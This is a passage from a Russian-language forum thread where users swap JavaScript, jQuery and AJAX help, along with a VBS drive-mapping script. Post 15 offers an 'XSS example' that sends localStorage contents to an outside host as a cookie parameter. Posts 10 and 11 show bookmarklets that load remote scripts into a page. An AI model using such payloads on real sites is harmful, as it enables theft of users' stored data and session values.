[JavaScript, AJAX] Задай вопрос, получи ответ

Discussion in 'PHP' started by banned, 9 Jun 2007.

Thread Status:
Not open for further replies.
  1. programming

    programming New Member

    Joined:
    26 Aug 2009
    Messages:
    190
    Likes Received:
    3
    Reputations:
    0
    Да, вывожу алертом и урл ссылки вылетает, но затем идёт переход на рейт.пхп. Как остаться на той же странице?

    А.. всё. дошло как это сделать.
     
    #2461 programming, 11 Jul 2010
    Last edited: 11 Jul 2010
  2. dIma^^

    dIma^^ New Member

    Joined:
    28 Apr 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите,как с помощью ajax сделать авто-обновление определённого html кода(не всё страницу)
     
  3. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    dima^^, примитивный пример с jquery
    Code:
    <html>
    <head>
      <title>Random Number</title>
      <script type="text/javascript" src="../../jquery.js"></script>
      <script type="text/javascript">
        $(document).ready (function () {
          getNumber = function () {
            var url = "random.php";
            $.get (url, {'min': 1, 'max': 100}, function (data) {
              $("#random").html (data);
            }, "text");
            return false;
          }
    
          $("#but").click (getNumber);
        });
      </script>
    </head>
    
    <body>
    
    <h3>Get random number</h3>
    <div id="random"></div>
    <button id="but">Get</button>
    
    </body>
    
    </html>
    
    По клику на кнопке происходит GET-запрос (Ajax) на пхп-скрипт random.php, который возвращает случайное число. Результат помещается в DIV
     
  4. dIma^^

    dIma^^ New Member

    Joined:
    28 Apr 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Спасибо большое. плюсанул ^_^
     
  5. Irdis

    Irdis Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    248
    Likes Received:
    52
    Reputations:
    3
    Есть
    Как сделать так, чтобы при попытке отчистить input, значение "" заменялось на "-";
     
  6. gri.n

    gri.n New Member

    Joined:
    12 Nov 2008
    Messages:
    124
    Likes Received:
    4
    Reputations:
    0
    Мужики ! подскажите как сделать. ?????
    Групповой политикой раздаю скрипт на шару

    "share.vbs: "

    Option Explicit
    Dim WshNetwork
    Set WshNetwork = WScript.CreateObject("WScript.Network")
    On Error Resume Next
    WshNetwork.MapNetworkDrive "S:", "\\s10\data01\comon\buffer"
    ErrCheck Err.Number
    Sub ErrCheck(nr)
    Select Case nr
    Case 0
    Case -2147024811
    End Select
    End Sub

    Шара поднимается удачно , но когда вхожу в мой комп на шаре написано

    Buffer на "s10\data01\comon" (S:)

    Как дописать скрипт так чтоб шара называлась просто : Buffer (S:)
    И юзвери не видели путь шары. (чтоб лишних вопросов не задавали. меньше знают лучше спят)
    HELP !!!!
     
  7. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    PHP:
    <script>
    function 
    check_inp(inp)
    {
    if (
    inp.value == '') {inp.value '-';}
    }
    </script>
    <input type="text" class="time_input" id="stationsAr2357" onchange="check_inp(this);" name="stationsAr2357">
    Можно на onkeyup также повесить.
     
    1 person likes this.
  8. programming

    programming New Member

    Joined:
    26 Aug 2009
    Messages:
    190
    Likes Received:
    3
    Reputations:
    0
    Как можно сделать такое на jQuery?
    http://qip.enjoy.ru/add/ (над "ваш креатифф"). Нужно реализовать такое же выделение картинок и чтобы потом можно было определить допустим value, выделенного элемента.
    Спасибо.
     
  9. Byte_

    Byte_ Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    143
    Likes Received:
    34
    Reputations:
    2
    создаём поле типа hidden
    Code:
    <input type="hidden" value="0" id="fid" />
    потом
    Code:
    <div id="images">
    <img class="0" src="/0.gif" alt="" />
    <img class="1" src="/1.gif" alt="" />
    <img class="2" src="/2.gif" alt="" />
    <img class="3" src="/3.gif" alt="" />
    <img class="4" src="/4.gif" alt="" />
    <!--и так далее-->
    </div>
    
    потом скрипт
    Code:
    $(document).ready(function(){
    $('#images img').click(function(){
    $('#images img').css({'border':'none'});//убираем отовсюду рамку
    $(this).css({'border':'1px solid red'});//ставим на этот элемент рамку
    $('#fid').val($(this).attr('class'));//устанавливаем значение поля
    });
    });
    
    писал без проверки, могут быть ошибки
     
    1 person likes this.
  10. HighExcel

    HighExcel Well-Known Member

    Joined:
    2 Aug 2007
    Messages:
    43
    Likes Received:
    354
    Reputations:
    6
    исправьте пожалуйста

    Code:
    javascript:var%20s%20=document.createElement('script');s.src='http://127.0.0.1/script.js';document.body.appendChild(s);
    (букмарклет, подкружающий скрипт)
     
    1 person likes this.
  11. Vlad&slav

    Vlad&slav Member

    Joined:
    1 Jan 2009
    Messages:
    207
    Likes Received:
    41
    Reputations:
    9

    Code:
    javascript:(function(){var s=document.createElement('script'); s.src='http://fffff.far.ru/alert.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })(); 
    http://fffff.far.ru/
     
    1 person likes this.
  12. Vlad&slav

    Vlad&slav Member

    Joined:
    1 Jan 2009
    Messages:
    207
    Likes Received:
    41
    Reputations:
    9
    document.getElementById("123").select(); выделяет всё,
    а можно выделить только часть текста в текстариа? например с 10 по 20 символ или как там
     
  13. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    Vlad&slav
    Code:
    setSelectionRange (10, 20);
    
     
    2 people like this.
  14. acdel

    acdel Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    139
    Likes Received:
    57
    Reputations:
    3


    HTML:
    <!DOCTYPE html>
    <html manifest="remy.manifest">
    <!– continues … –>
    <html lang="en">
      <head>
        <meta charset="utf-8">	
        <title>123</title>
      </head>
      <body>
    
    <script type="text/javascript">
    if(typeof(localStorage) == ‘undefined’ ) {
     alert('Ваш браузер не поддерживает localStorage()');
     }
     else {
     try {
     localStorage.setItem('name', 'Hello World!'); //сохраняет строку "Hello World" по ключу name
     }
     catch (e) {
     if (e == QUOTA_EXCEEDED_ERR) {
     alert('Кончилось место'); //данные не сохранены, так как кончилось доступное место
     }
     }
    alert(localStorage.getItem('name')); //Hello World!
    localStorage.removeItem('name'); //удаляет значение по ключу name
    }
    
     </script> 
    
      </body>
    </html>
    
    Нужно добавить <html manifest="remy.manifest">

    UPD: all browsers other than Firefox 3.5
     
    #2474 acdel, 19 Jul 2010
    Last edited: 19 Jul 2010
    1 person likes this.
  15. acdel

    acdel Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    139
    Likes Received:
    57
    Reputations:
    3
    У меня ФФ4 бетка 1, сработало.

    Вот список функций и браузеры которые потдерживают.
    http://www.quirksmode.org/dom/html5.html#localstorage

    И доки http://www.w3.org/TR/webstorage/

    Тоже в тему, либа http://github.com/thewojogroup/local-storage-js

    И примерчик XSS, попробуй его.( Firefox 2, IE 8, Safari 4 )
    Code:
    <script>
    document.write("<img src='http://site.com?cookie="+localStorage.getItem('foo')+"'>");
    </script>
     
    #2475 acdel, 19 Jul 2010
    Last edited: 19 Jul 2010
  16. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,676
    Likes Received:
    147
    Reputations:
    18
    Привет.

    Хотел спросить как сделать такое меню Select

    Например есть три 3 меню селекта типа - Select1 - Select2

    Напимер если я выбираю из Select1 - "категория 1" - то в Select2 выводился список категория из "Категория 1"

    Как такое сделать ? т.е я выбираю из select 1 какуюто категорию - а в select2 появляються подкатегории
     
  17. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    http://www.tigir.com/javascript_select.htm
    а вообще в гугле дофига ссылок вылазит по этой теме
     
    #2477 SHiNiGaMi, 20 Jul 2010
    Last edited: 20 Jul 2010
    1 person likes this.
  18. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    Adio, как вариант - сделать ещё один дополнительный select невидимым. При нужном условии его сделать видимым, предыдущий скрыть.

    Правда, если дальше придётся делать отправку формы, будет косяк, но осуществляется проще :)
     
  19. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    достаточно просто это делается с помощью массивов, а вообще я это ajax'ом делаю, когда много данных из подкатегорий
     
    1 person likes this.
  20. programming

    programming New Member

    Joined:
    26 Aug 2009
    Messages:
    190
    Likes Received:
    3
    Reputations:
    0
    Каким образом можно сделать эффект на jquery, чтобы в div'е при нажатии на одну кнопку 1-й текст уезжал влево и исчезал, а второй приезжал с правой стороны и после этого при нажатии на другую кнопку 2-й текст уезжал влево и растворялся, а 1-й приезжал на то же место справа?

    Проблема решена.
     
    #2480 programming, 22 Jul 2010
    Last edited: 22 Jul 2010
Loading...
Thread Status:
Not open for further replies.